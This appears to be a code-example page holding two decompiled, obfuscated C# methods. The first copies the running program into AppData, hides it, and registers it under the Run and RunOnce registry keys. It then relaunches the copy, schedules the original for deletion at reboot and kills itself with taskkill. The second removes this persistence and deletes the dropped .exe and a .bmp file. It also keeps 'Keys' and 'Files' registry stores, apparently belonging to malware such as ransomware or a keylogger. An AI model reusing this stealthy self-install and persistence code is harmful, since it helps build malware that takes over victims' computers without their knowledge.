示例#1
0
    public void method_1()
    {
        this.method_7();
        string text    = Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData);
        string string_ = Delegate123.smethod_0(Delegate122.smethod_0(Delegate121.smethod_0()));
        string text2   = Delegate123.smethod_1(Delegate122.smethod_0(Delegate121.smethod_0()));
        string text3   = Delegate124.smethod_0("/F /IM ", text2);
        string object_ = Delegate125.smethod_0(text, "\\", this.string_3, ".exe");

        this.registryKey_0 = Delegate126.smethod_0(Registry.CurrentUser, Delegate88.smethod_0("Software\\", this.string_3, "\\Files"));
        this.registryKey_1 = Delegate126.smethod_0(Registry.CurrentUser, Delegate88.smethod_0("Software\\", this.string_3, "\\Keys"));
        if (this.registryKey_1 == null)
        {
            Delegate127.smethod_0(Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Keys"), "", "", RegistryValueKind.String);
        }
        if (this.registryKey_0 == null)
        {
            Delegate127.smethod_0(Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Files"), "", "", RegistryValueKind.String);
        }
        Delegate127.smethod_0("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", this.string_3, object_, RegistryValueKind.String);
        Delegate127.smethod_0("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Delegate124.smethod_0("*", this.string_3), object_, RegistryValueKind.String);
        Delegate128.smethod_0(string_, FileAttributes.Hidden);
        if (Delegate129.smethod_0(text) && !Delegate129.smethod_1(object_))
        {
            Delegate104.smethod_0(10000);
            try
            {
                Delegate130.smethod_0(string_, object_);
                ProcessStartInfo processStartInfo = Delegate21.smethod_0();
                Delegate131.smethod_0(processStartInfo, object_);
                ProcessStartInfo processStartInfo2 = Delegate21.smethod_0();
                Delegate132.smethod_0(processStartInfo2, false);
                Delegate132.smethod_1(processStartInfo2, true);
                Delegate131.smethod_0(processStartInfo2, "taskkill");
                Delegate131.smethod_1(processStartInfo2, text3);
                Delegate133.smethod_0(processStartInfo);
                GClass0.MoveFileEx(string_, null, 4);
                Delegate133.smethod_0(processStartInfo2);
            }
            catch (Exception)
            {
            }
        }
    }
示例#2
0
    public void method_24()
    {
        string      text         = Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData);
        string      string_      = Delegate125.smethod_0(text, "\\", this.string_3, ".exe");
        string      text2        = Delegate125.smethod_0(text, "\\", this.string_3, ".bmp");
        string      text3        = Delegate124.smethod_0("/F /IM ", Delegate123.smethod_1(Delegate122.smethod_0(Delegate121.smethod_0())));
        RegistryKey registryKey  = Delegate173.smethod_0(Registry.CurrentUser, "Software", true);
        RegistryKey registryKey2 = Delegate173.smethod_0(Registry.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        RegistryKey registryKey3 = Delegate173.smethod_0(Registry.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true);

        if (registryKey2 != null)
        {
            Delegate198.smethod_0(registryKey2, this.string_3);
        }
        if (registryKey3 != null)
        {
            Delegate198.smethod_0(registryKey3, Delegate124.smethod_0("*", this.string_3));
        }
        if (registryKey != null)
        {
            Delegate198.smethod_1(registryKey, this.string_3);
        }
        if (Delegate129.smethod_1(string_))
        {
            Delegate128.smethod_0(string_, FileAttributes.Hidden);
            GClass0.MoveFileEx(string_, null, 4);
            try
            {
                Delegate100.smethod_1(text2);
            }
            catch (Exception)
            {
            }
        }
        ProcessStartInfo processStartInfo = Delegate21.smethod_0();

        Delegate132.smethod_0(processStartInfo, false);
        Delegate132.smethod_1(processStartInfo, true);
        Delegate131.smethod_0(processStartInfo, "taskkill");
        Delegate131.smethod_1(processStartInfo, text3);
        Delegate133.smethod_0(processStartInfo);
    }